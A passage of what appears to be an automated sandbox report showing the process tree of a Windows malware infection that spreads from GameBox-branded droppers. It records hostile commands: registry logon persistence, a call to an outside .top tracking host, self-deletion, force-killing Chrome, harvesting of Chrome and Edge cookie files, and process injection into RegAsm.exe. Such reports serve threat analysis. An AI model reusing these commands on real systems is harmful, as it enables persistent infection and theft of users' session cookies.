                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-A438G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6116
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-A7QVL.tmp\Setup.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-A7QVL.tmp\Setup.tmp" /SL5="$10440,17368975,721408,C:\Users\Admin\AppData\Local\Temp\is-A438G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                    8⤵
                                                                                      PID:5504
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7DL34.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                        9⤵
                                                                                          PID:3508
                                                                                          • C:\Windows\SysWOW64\expand.exe
                                                                                            expand C:\Users\Admin\AppData\Local\Temp\is-7DL34.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                            10⤵
                                                                                            • Drops file in Windows directory
                                                                                            PID:6328
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                          9⤵
                                                                                            PID:9116
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                              10⤵
                                                                                                PID:8560
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-7DL34.tmp\{app}\vdi_compiler.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-7DL34.tmp\{app}\vdi_compiler"
                                                                                              9⤵
                                                                                                PID:6952
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7DL34.tmp\{app}\vdi_compiler.exe"
                                                                                                  10⤵
                                                                                                    PID:8928
                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                      ping localhost -n 4
                                                                                                      11⤵
                                                                                                      • Runs ping.exe
                                                                                                      PID:7364
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                                  9⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Checks computer location settings
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:6680
                                                                                                • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                                  "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                                  9⤵
                                                                                                  • Loads dropped DLL
                                                                                                  PID:6188
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          • Drops file in Program Files directory
                                                                                          PID:3752
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:2064
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                            6⤵
                                                                                              PID:7748
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f /im chrome.exe
                                                                                                7⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:7324
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:4820
                                                                                            • C:\Users\Admin\Documents\Gymqy_PWZwz9ze_ybAt7K4p4.exe
                                                                                              "C:\Users\Admin\Documents\Gymqy_PWZwz9ze_ybAt7K4p4.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:6080
                                                                                            • C:\Users\Admin\Documents\T_OclZPgUIXoDpwRWk2ErXB8.exe
                                                                                              "C:\Users\Admin\Documents\T_OclZPgUIXoDpwRWk2ErXB8.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:4772
                                                                                              • C:\Users\Admin\Documents\T_OclZPgUIXoDpwRWk2ErXB8.exe
                                                                                                C:\Users\Admin\Documents\T_OclZPgUIXoDpwRWk2ErXB8.exe
                                                                                                7⤵
                                                                                                  PID:3424
                                                                                              • C:\Users\Admin\Documents\qhmPuEn8WlS2rKnx4Xwoc8uQ.exe
                                                                                                "C:\Users\Admin\Documents\qhmPuEn8WlS2rKnx4Xwoc8uQ.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:6788
                                                                                              • C:\Users\Admin\Documents\_Mvug5Q7DbxbnkcNwbSH7z8E.exe
                                                                                                "C:\Users\Admin\Documents\_Mvug5Q7DbxbnkcNwbSH7z8E.exe"
                                                                                                6⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:6776
                                                                                              • C:\Users\Admin\Documents\zQRkTXaG3agW5Ixd8_jy78FZ.exe
                                                                                                "C:\Users\Admin\Documents\zQRkTXaG3agW5Ixd8_jy78FZ.exe"
                                                                                                6⤵
                                                                                                  PID:6764
                                                                                                • C:\Users\Admin\Documents\buaPMfLsxyXxiKvjmc9kbHmi.exe
                                                                                                  "C:\Users\Admin\Documents\buaPMfLsxyXxiKvjmc9kbHmi.exe"
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  PID:6940
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 824
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:5848
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 956
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:4556
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 984
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:4116
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 1048
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7220
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 1400
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7964
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 1524
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Program crash
                                                                                                    PID:4044
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 1576
                                                                                                    7⤵
                                                                                                    • Program crash
                                                                                                    PID:7316
                                                                                                • C:\Users\Admin\Documents\TkjnOcqucYlDXud8fLIAJ2AG.exe
                                                                                                  "C:\Users\Admin\Documents\TkjnOcqucYlDXud8fLIAJ2AG.exe"
                                                                                                  6⤵
                                                                                                    PID:6928
                                                                                                    • C:\Users\Admin\AppData\Roaming\1662551.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\1662551.exe"
                                                                                                      7⤵
                                                                                                        PID:7976
                                                                                                      • C:\Users\Admin\AppData\Roaming\5789121.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\5789121.exe"
                                                                                                        7⤵
                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                        PID:8020
                                                                                                    • C:\Users\Admin\Documents\s5uPdmpATLTtgFdRwiW1LX3M.exe
                                                                                                      "C:\Users\Admin\Documents\s5uPdmpATLTtgFdRwiW1LX3M.exe"
                                                                                                      6⤵
                                                                                                        PID:6404
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 672
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:3984
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 768
                                                                                                          7⤵
                                                                                                          • Program crash
                                                                                                          PID:4556
                                                                                                      • C:\Users\Admin\Documents\ChLEdeWxjsg9Ck1TuYOdzLQG.exe
                                                                                                        "C:\Users\Admin\Documents\ChLEdeWxjsg9Ck1TuYOdzLQG.exe"
                                                                                                        6⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:6396
                                                                                                      • C:\Users\Admin\Documents\MBqd2ybPuq7LDFHJI3tPZfy8.exe
                                                                                                        "C:\Users\Admin\Documents\MBqd2ybPuq7LDFHJI3tPZfy8.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:6388
                                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                          7⤵
                                                                                                            PID:4216
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              8⤵
                                                                                                                PID:3264
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                8⤵
                                                                                                                  PID:4048
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  8⤵
                                                                                                                    PID:5496
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    8⤵
                                                                                                                      PID:7616
                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                    7⤵
                                                                                                                      PID:6680
                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                      7⤵
                                                                                                                        PID:6724
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:7728
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                              PID:7468
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                                PID:3404
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                8⤵
                                                                                                                                  PID:1584
                                                                                                                            • C:\Users\Admin\Documents\8aZb9ULyVlXkdFu4rMGYt_IS.exe
                                                                                                                              "C:\Users\Admin\Documents\8aZb9ULyVlXkdFu4rMGYt_IS.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:6380
                                                                                                                            • C:\Users\Admin\Documents\E3HSROqOzGzLxsIKKQ0unHUS.exe
                                                                                                                              "C:\Users\Admin\Documents\E3HSROqOzGzLxsIKKQ0unHUS.exe"
                                                                                                                              6⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                              PID:6532
                                                                                                                            • C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe
                                                                                                                              "C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe"
                                                                                                                              6⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:6904
                                                                                                                              • C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe
                                                                                                                                C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe
                                                                                                                                7⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4572
                                                                                                                              • C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe
                                                                                                                                C:\Users\Admin\Documents\Oz3aBYz16cjDytTsf2o2nLa7.exe
                                                                                                                                7⤵
                                                                                                                                  PID:6540
                                                                                                                              • C:\Users\Admin\Documents\1JQCDnHYJFmSrEvfhqyvAdjr.exe
                                                                                                                                "C:\Users\Admin\Documents\1JQCDnHYJFmSrEvfhqyvAdjr.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:6884
                                                                                                                                • C:\Users\Admin\Documents\ukHNMiHKGgMxlNvmoUccVEXq.exe
                                                                                                                                  "C:\Users\Admin\Documents\ukHNMiHKGgMxlNvmoUccVEXq.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5264
                                                                                                                                  • C:\Users\Admin\Documents\ukHNMiHKGgMxlNvmoUccVEXq.exe
                                                                                                                                    C:\Users\Admin\Documents\ukHNMiHKGgMxlNvmoUccVEXq.exe
                                                                                                                                    7⤵
                                                                                                                                      PID:1296
                                                                                                                                  • C:\Users\Admin\Documents\d6Wqj4m8wbVAZR18XD_YK2md.exe
                                                                                                                                    "C:\Users\Admin\Documents\d6Wqj4m8wbVAZR18XD_YK2md.exe"
                                                                                                                                    6⤵
                                                                                                                                      PID:1000
                                                                                                                                      • C:\Users\Admin\Documents\d6Wqj4m8wbVAZR18XD_YK2md.exe
                                                                                                                                        "C:\Users\Admin\Documents\d6Wqj4m8wbVAZR18XD_YK2md.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:8596
                                                                                                                                    • C:\Users\Admin\Documents\EYM8V_c8nu8lS4ecs4G6Nzev.exe
                                                                                                                                      "C:\Users\Admin\Documents\EYM8V_c8nu8lS4ecs4G6Nzev.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                      PID:4984
                                                                                                                                    • C:\Users\Admin\Documents\GVkhdARWxjH7noZYN19xJdbg.exe
                                                                                                                                      "C:\Users\Admin\Documents\GVkhdARWxjH7noZYN19xJdbg.exe"
                                                                                                                                      6⤵
                                                                                                                                        PID:808
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-0N571.tmp\GVkhdARWxjH7noZYN19xJdbg.tmp
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-0N571.tmp\GVkhdARWxjH7noZYN19xJdbg.tmp" /SL5="$4047C,138429,56832,C:\Users\Admin\Documents\GVkhdARWxjH7noZYN19xJdbg.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:5912
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EDP2J.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EDP2J.tmp\Setup.exe" /Verysilent
                                                                                                                                            8⤵
                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                            PID:7864
                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                              9⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:8104
                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629274919 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                10⤵
                                                                                                                                                  PID:8920
                                                                                                                                        • C:\Users\Admin\Documents\3__gLAu78moEA9TYiJZ9D119.exe
                                                                                                                                          "C:\Users\Admin\Documents\3__gLAu78moEA9TYiJZ9D119.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:6696
                                                                                                                                            • C:\Users\Admin\Documents\3__gLAu78moEA9TYiJZ9D119.exe
                                                                                                                                              "C:\Users\Admin\Documents\3__gLAu78moEA9TYiJZ9D119.exe" -q
                                                                                                                                              7⤵
                                                                                                                                                PID:7508
                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4744
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp438D_tmp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp438D_tmp.exe"
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4944
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                7⤵
                                                                                                                                                  PID:1936
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    cmd
                                                                                                                                                    8⤵
                                                                                                                                                      PID:6368
                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                        findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5012
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                          Esplorarne.exe.com i
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:6928
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                            10⤵
                                                                                                                                                              PID:5044
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                11⤵
                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                PID:7760
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                  12⤵
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:7388
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                    13⤵
                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                    PID:5704
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                      14⤵
                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                      PID:7924
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:8144
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                            16⤵
                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                            PID:5892
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                              17⤵
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:7740
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                18⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:6280
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  19⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:7344
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    20⤵
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:8448
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      21⤵
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:8764
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        22⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:9212
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          23⤵
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:8512
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            24⤵
                                                                                                                                                                                              PID:8904
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                25⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:2508
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  26⤵
                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                  PID:8344
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                      PID:8516
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                          PID:8264
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            29⤵
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:8852
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                              PID:2988
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                  PID:8376
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                    PID:8516
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                      33⤵
                                                                                                                                                                                                                        PID:8664
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          34⤵
                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:7356
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
